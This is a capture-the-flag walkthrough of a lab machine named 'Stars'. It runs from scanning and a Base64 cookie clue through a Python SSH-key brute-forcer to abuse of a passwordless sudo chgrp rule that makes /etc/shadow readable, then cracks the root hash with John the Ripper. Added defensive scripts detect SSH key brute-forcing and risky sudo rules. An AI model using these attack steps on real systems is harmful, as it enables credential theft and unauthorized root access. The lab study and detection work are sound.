Stars

To begin with, we obtain the IP of the victim machine using the following command:

arp-scan -I eth0 --localnet

And now we perform a quick scan of all its ports to see which ones are open.

nmap -sS -p- --min-rate 4500 -n -Pn IP

Now we conduct a more detailed scan of those ports.

nmap -sCV -p22,80 -n -Pn IP
We scan the open ports

We enter the website hosted on this machine and come across the following text:

Homepage

I decide to list directories and files using the Gobuster tool, and we come across a .txt file that gives us a clue.

gobuster dir -u http://IP/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,zip,php -t 130
Hidden text file
Content of sshnote.txt

We also obtain a possible username.

The next step is to use Burp Suite, where we come across a Cookie that appears to be text in Base64 format.

Cookie in Base64 format

We decode it, and this is the result:

echo "cG9pc29uZWRnaWZ0LnR4dA==" | base64 -d
We decode the Base64-encoded text.

It turns out we have found a new hidden file on the website. It seems to be the private key for SSH access.

Private key

But it seems we can't use it yet, as the sshnote.txt file mentioned: the key contains a '***' placeholder standing in for three missing uppercase letters. I create a file called id_rsa.txt with the content of the private key and quickly write a program (generated with AI) to automate substituting every three-letter combination into the key and testing it over SSH until one works. Here's the code:

import itertools
import os
import subprocess

# SSH target ('IP' is a placeholder for the victim machine's address)
ip = 'IP'
username = 'sophie'

# Path to the file containing the private key, with '***' where the
# three missing uppercase letters go
private_key_path = './id_rsa.txt'
temp_key_path = 'temp_key_file'

# Read the private key template from the file
with open(private_key_path, 'r') as file:
    private_key_data = file.read()

# Generate all possible combinations of three uppercase letters
letters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
combinations = itertools.product(letters, repeat=3)

try:
    # Iterate over the combinations and try SSH with each one
    for combo in combinations:
        key = ''.join(combo)
        # Write the candidate key to a temporary file
        with open(temp_key_path, 'w') as key_file:
            key_file.write(private_key_data.replace('***', key))
        # ssh refuses private keys that are readable by other users
        os.chmod(temp_key_path, 0o600)
        # Run ssh non-interactively: BatchMode disables password/passphrase
        # prompts, the remote command 'exit' returns immediately instead of
        # opening a shell, and the timeouts avoid hanging on a slow host
        ssh_command = [
            'ssh', '-i', temp_key_path,
            '-o', 'BatchMode=yes',
            '-o', 'StrictHostKeyChecking=accept-new',
            '-o', 'ConnectTimeout=5',
            f'{username}@{ip}', 'exit',
        ]
        try:
            subprocess.run(ssh_command, check=True, timeout=15,
                           stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
            print(f'Successful SSH connection using key: {key}')
            break  # Stop the loop once a valid key is found
        except subprocess.CalledProcessError:
            print(f'Error: Authentication failed with key: {key}')
        except subprocess.TimeoutExpired:
            print(f'Error: Connection timed out with key: {key}')
finally:
    # Always remove the temporary key file, whether or not a key was found
    if os.path.exists(temp_key_path):
        os.remove(temp_key_path)

Finally, we give permissions to the file, execute it, and we're in:

chmod +x auto_ssh.py
We are Sophie and we have the user flag

And we obtain the User Flag.
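From the defender's side, the key-guessing loop above is noisy: every wrong candidate opens a fresh SSH connection that fails before authentication and is then closed by the client. The following script is an added example, not part of the original write-up, that scans sshd log lines for bursts of pre-auth disconnects from one (user, source) pair and reports whether a successful login followed the burst. The log lines are constructed for this example (the exact wording sshd emits depends on its LogLevel), and the year, the 5-attempt threshold and the 60-second window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample auth.log lines in the shape sshd writes when a client
# presents a key, fails, and disconnects. Hostnames, addresses, fingerprints
# and timestamps are made up for this example.
SAMPLE_LOG = """\
Mar 10 12:00:01 stars sshd[1201]: Connection closed by authenticating user sophie 192.0.2.10 port 50001 [preauth]
Mar 10 12:00:01 stars sshd[1203]: Connection closed by authenticating user sophie 192.0.2.10 port 50002 [preauth]
Mar 10 12:00:02 stars sshd[1205]: Connection closed by authenticating user sophie 192.0.2.10 port 50003 [preauth]
Mar 10 12:00:02 stars sshd[1207]: Connection closed by authenticating user sophie 192.0.2.10 port 50004 [preauth]
Mar 10 12:00:03 stars sshd[1209]: Connection closed by authenticating user sophie 192.0.2.10 port 50005 [preauth]
Mar 10 12:00:03 stars sshd[1211]: Connection closed by authenticating user sophie 192.0.2.10 port 50006 [preauth]
Mar 10 12:00:04 stars sshd[1213]: Accepted publickey for sophie from 192.0.2.10 port 50007 ssh2: RSA SHA256:PLACEHOLDERFINGERPRINT
Mar 10 12:30:00 stars sshd[1400]: Connection closed by authenticating user alice 198.51.100.7 port 40001 [preauth]
Mar 10 12:31:00 stars sshd[1401]: Accepted publickey for alice from 198.51.100.7 port 40002 ssh2: ED25519 SHA256:ANOTHERPLACEHOLDER
"""

# syslog prefix: "Mon DD HH:MM:SS host sshd[pid]: message"
LINE_RE = re.compile(
    r'^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (?P<msg>.*)$')
FAILED_RE = re.compile(
    r'Connection closed by authenticating user (?P<user>\S+) (?P<ip>\S+) port \d+ \[preauth\]')
ACCEPTED_RE = re.compile(
    r'Accepted publickey for (?P<user>\S+) from (?P<ip>\S+) port \d+')


def parse_ts(ts, year=2024):
    # syslog timestamps carry no year; an assumed year makes window arithmetic work
    return datetime.strptime(f'{year} {ts}', '%Y %b %d %H:%M:%S')


def detect_key_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return (user, ip, burst_size, followed_by_success) for every (user, ip)
    pair with at least `threshold` pre-auth disconnects inside one `window`."""
    failures = defaultdict(list)   # (user, ip) -> timestamps of pre-auth disconnects
    successes = defaultdict(list)  # (user, ip) -> timestamps of accepted logins
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = parse_ts(m['ts'])
        f = FAILED_RE.match(m['msg'])
        if f:
            failures[(f['user'], f['ip'])].append(ts)
            continue
        a = ACCEPTED_RE.match(m['msg'])
        if a:
            successes[(a['user'], a['ip'])].append(ts)

    alerts = []
    for key, times in failures.items():
        times.sort()
        # sliding window over sorted timestamps: size of the densest burst
        best, start = 0, 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            last_fail = times[-1]
            # a login accepted right after the burst is the strongest signal
            followed = any(last_fail <= s <= last_fail + window
                           for s in successes.get(key, []))
            alerts.append((key[0], key[1], best, followed))
    return alerts


if __name__ == '__main__':
    for user, ip, n, followed in detect_key_bruteforce(SAMPLE_LOG):
        print(f'{user}@{ip}: {n} pre-auth disconnects within a minute; '
              f'login accepted right after: {followed}')
```

Run against real logs, the same function would read `/var/log/auth.log` (or `journalctl -u ssh` output) instead of the constructed sample; lowering `MaxStartups` and enabling `LogLevel VERBOSE` in sshd_config makes each rejected key fingerprint visible as well.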

Now, with the command "sudo -l" we observe that we can execute the chgrp binary as the root user with sudo without a password.

Let's see how it's used with the following command:

sudo -u root /usr/bin/chgrp --help

So, we can change the group of any file we want. What I do is change the group of the file /etc/shadow to sophie: /etc/shadow is group-readable (root:shadow, mode 0640 by default), so once its group is sophie we can read it.

sudo -u root /usr/bin/chgrp sophie /etc/shadow

We open it with cat and copy the line where root is located, then paste it into a file on our local machine named shadow.txt. Now, we'll open the file /etc/passwd and do the same as before, but copy and paste the content into a file named passwd.txt.
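The escalation above relies on two things an administrator can check for: a passwordless sudo rule on a binary that changes file ownership or permissions, and /etc/shadow drifting from its expected owner, group and mode. The following script is an added example (not the write-up's code) that parses `sudo -l` output for such rules and compares a file's metadata with a baseline. The `sudo -l` text, the list of ownership-changing binaries and the stand-in file used for the demo are constructed; the demo cannot actually run chgrp on a file it does not own, so it simulates the drift by expecting a group the file does not have. It assumes a POSIX system.

```python
import os
import re
import stat
import tempfile

# Binaries that change file ownership or permission bits. A passwordless sudo
# rule on any of them lets the user grant themselves access to files such as
# /etc/shadow, as the chgrp rule above does. Constructed list for this example.
OWNERSHIP_BINARIES = {'chgrp', 'chown', 'chmod', 'setfacl'}

# Constructed sample of `sudo -l` output; not copied from the write-up.
SAMPLE_SUDO_L = """\
Matching Defaults entries for sophie on stars:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User sophie may run the following commands on stars:
    (root) NOPASSWD: /usr/bin/chgrp
    (root) /usr/bin/systemctl restart apache2
"""

# One `sudo -l` rule line: "(runas) [TAG: ...] command [args]"
RULE_RE = re.compile(
    r'^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$')


def find_risky_sudo_rules(sudo_l_output):
    """Return (runas, command) for every rule that runs an ownership- or
    permission-changing binary (or ALL) as root without a password."""
    risky = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = set(re.split(r'[\s:,]+', m['runas'].strip()))
        tags = {t.rstrip(':') for t in m['tags'].split()}
        cmd = m['cmd'].strip()
        binary = os.path.basename(cmd.split()[0])
        if (runas & {'root', 'ALL'} and 'NOPASSWD' in tags
                and (binary == 'ALL' or binary in OWNERSHIP_BINARIES)):
            risky.append((m['runas'].strip(), cmd))
    return risky


def check_file_baseline(path, expected_uid, expected_gid, expected_mode):
    """Compare owner, group and permission bits of `path` with a baseline
    (for /etc/shadow on Debian-style systems: uid 0, gid of 'shadow', 0640).
    Returns a list of findings; an empty list means the file is intact."""
    st = os.stat(path)
    findings = []
    if st.st_uid != expected_uid:
        findings.append(f'{path}: owner uid {st.st_uid}, expected {expected_uid}')
    if st.st_gid != expected_gid:
        findings.append(f'{path}: group gid {st.st_gid}, expected {expected_gid}')
    mode = stat.S_IMODE(st.st_mode)
    if mode != expected_mode:
        findings.append(f'{path}: mode {mode:04o}, expected {expected_mode:04o}')
    return findings


def demo_shadow_check():
    """Run the baseline check on a constructed stand-in for /etc/shadow.
    Returns (findings_when_intact, findings_after_simulated_chgrp)."""
    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        path = tmp.name
    try:
        os.chmod(path, 0o640)
        uid, gid = os.getuid(), os.getgid()
        intact = check_file_baseline(path, uid, gid, 0o640)
        # a chgrp to another group shows up as a gid mismatch; simulated here
        # by expecting a gid the file does not have
        drifted = check_file_baseline(path, uid, gid + 1, 0o640)
        return intact, drifted
    finally:
        os.remove(path)


if __name__ == '__main__':
    for runas, cmd in find_risky_sudo_rules(SAMPLE_SUDO_L):
        print(f'risky sudo rule: ({runas}) NOPASSWD: {cmd}')
    intact, drifted = demo_shadow_check()
    print('intact:', intact or 'no findings')
    print('after simulated chgrp:', drifted)
```

On a real host the baseline for /etc/shadow would be `check_file_baseline('/etc/shadow', 0, grp.getgrnam('shadow').gr_gid, 0o640)`, and the fix for the rule itself is to remove the NOPASSWD entry or restrict the command to explicit, non-sensitive arguments.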

Now, let's crack the root user's password hash. To do this, we'll use unshadow and John The Ripper:

unshadow passwd.txt shadow.txt > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
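The unshadow step merges the two files so that each record carries the username from /etc/passwd together with its hash from /etc/shadow, which is the layout John expects. The following Python re-implementation is an added example, not the write-up's code and not the unshadow tool itself; it shows the merge and then sorts the merged accounts into those that carry a hash a cracker can actually work on and those that are locked, disabled or unmerged. The passwd/shadow records and the `$6$` hash value are constructed placeholders.

```python
# Constructed /etc/passwd and /etc/shadow records. The root hash is a
# placeholder in SHA-512-crypt layout ($6$salt$hash), not a real hash.
PASSWD_LINES = [
    'root:x:0:0:root:/root:/bin/bash',
    'sophie:x:1000:1000:sophie,,,:/home/sophie:/bin/bash',
    'www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin',
]
SHADOW_LINES = [
    'root:$6$PLACEHOLDERSALT$PLACEHOLDERHASH:19000:0:99999:7:::',
    'sophie:!$6$LOCKEDPLACEHOLDER$HASH:19000:0:99999:7:::',
    'www-data:*:19000:0:99999:7:::',
]


def has_no_usable_hash(hash_field):
    """True when a cracker gets nothing from the field: empty (no password
    set), '*' or '!' prefix (disabled or locked account), or 'x' (the shadow
    entry was never merged in)."""
    return hash_field in ('', 'x') or hash_field.startswith(('!', '*'))


def unshadow(passwd_lines, shadow_lines):
    """Merge like the unshadow tool: replace the 'x' in field 2 of each passwd
    record with the hash field of the shadow record for the same user."""
    hashes = {}
    for line in shadow_lines:
        line = line.strip()
        if not line or line.startswith('#'):
            continue
        user, hash_field = line.split(':', 2)[:2]
        hashes[user] = hash_field
    merged = []
    for line in passwd_lines:
        fields = line.strip().split(':')
        if len(fields) != 7:        # malformed passwd record; keep it untouched
            merged.append(line)
            continue
        if fields[0] in hashes:
            fields[1] = hashes[fields[0]]
        merged.append(':'.join(fields))
    return merged


def split_crackable(merged_lines):
    """Return (accounts with a usable hash, accounts without one). Only the
    first group gives a cracking tool any work; the second is useful for an
    audit of which accounts are locked or have no password at all."""
    with_hash, unusable = [], []
    for line in merged_lines:
        fields = line.split(':')
        (unusable if has_no_usable_hash(fields[1]) else with_hash).append(fields[0])
    return with_hash, unusable


if __name__ == '__main__':
    merged = unshadow(PASSWD_LINES, SHADOW_LINES)
    for record in merged:
        print(record)
    with_hash, unusable = split_crackable(merged)
    print('usable hashes:', with_hash)
    print('locked / disabled / unmerged:', unusable)
```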

And we find the root password:

Root user's password

Finally, we access root and obtain the Root Flag.

pwned
